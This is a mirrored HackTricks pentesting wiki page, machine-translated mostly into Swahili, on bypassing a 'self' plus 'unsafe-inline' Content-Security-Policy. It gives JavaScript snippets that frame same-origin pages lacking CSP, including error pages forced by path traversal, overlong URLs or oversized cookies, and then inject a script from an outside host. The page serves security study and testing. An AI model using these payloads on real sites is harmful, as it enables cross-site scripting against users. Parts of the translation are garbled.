maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md

2.5 KiB
Raw Blame History

A configuration such as:

Content-Security-Policy: default-src 'self' 'unsafe-inline';

Inakataza matumizi ya kazi zozote zinazotekeleza msimbo uliotumwa kama mfuatano. Kwa mfano: eval, setTimeout, setInterval zote zitazuiliwa kwa sababu ya mipangilio ya unsafe-eval

Maudhui yoyote kutoka vyanzo vya nje pia yanazuiliwa, ikiwa ni pamoja na picha, CSS, WebSockets, na, hasa, JS

Kupitia Maandishi & Picha

Imek observed kwamba vivinjari vya kisasa vinabadilisha picha na maandiko kuwa HTML ili kuboresha uonyeshaji wao (kwa mfano, kuweka mandharinyuma, kuzingatia, n.k.). Kwa hivyo, ikiwa picha au faili ya maandiko, kama favicon.ico au robots.txt, itafunguliwa kupitia iframe, inatolewa kama HTML. Kwa kuzingatia, kurasa hizi mara nyingi hazina vichwa vya CSP na zinaweza kutokuwa na X-Frame-Options, ikiruhusu utekelezaji wa JavaScript isiyo na mpangilio kutoka kwao:

frame = document.createElement("iframe")
frame.src = "/css/bootstrap.min.css"
document.body.appendChild(frame)
script = document.createElement("script")
script.src = "//example.com/csp.js"
window.frames[0].document.head.appendChild(script)

Makosa ya Via

Vivyo hivyo, majibu ya makosa, kama vile faili za maandiko au picha, kwa kawaida yanakuja bila vichwa vya CSP na yanaweza kukosa X-Frame-Options. Makosa yanaweza kusababisha kupakia ndani ya iframe, kuruhusu hatua zifuatazo:

// Inducing an nginx error
frame = document.createElement("iframe")
frame.src = "/%2e%2e%2f"
document.body.appendChild(frame)

// Triggering an error with a long URL
frame = document.createElement("iframe")
frame.src = "/" + "A".repeat(20000)
document.body.appendChild(frame)

// Generating an error via extensive cookies
for (var i = 0; i < 5; i++) {
document.cookie = i + "=" + "a".repeat(4000)
}
frame = document.createElement("iframe")
frame.src = "/"
document.body.appendChild(frame)
// Removal of cookies is crucial post-execution
for (var i = 0; i < 5; i++) {
document.cookie = i + "="
}

Baada ya kuanzisha mojawapo ya hali zilizotajwa, utekelezaji wa JavaScript ndani ya iframe unaweza kupatikana kama ifuatavyo:

script = document.createElement("script")
script.src = "//example.com/csp.js"
window.frames[0].document.head.appendChild(script)

Marejeo

{{#include ../../banners/hacktricks-training.md}}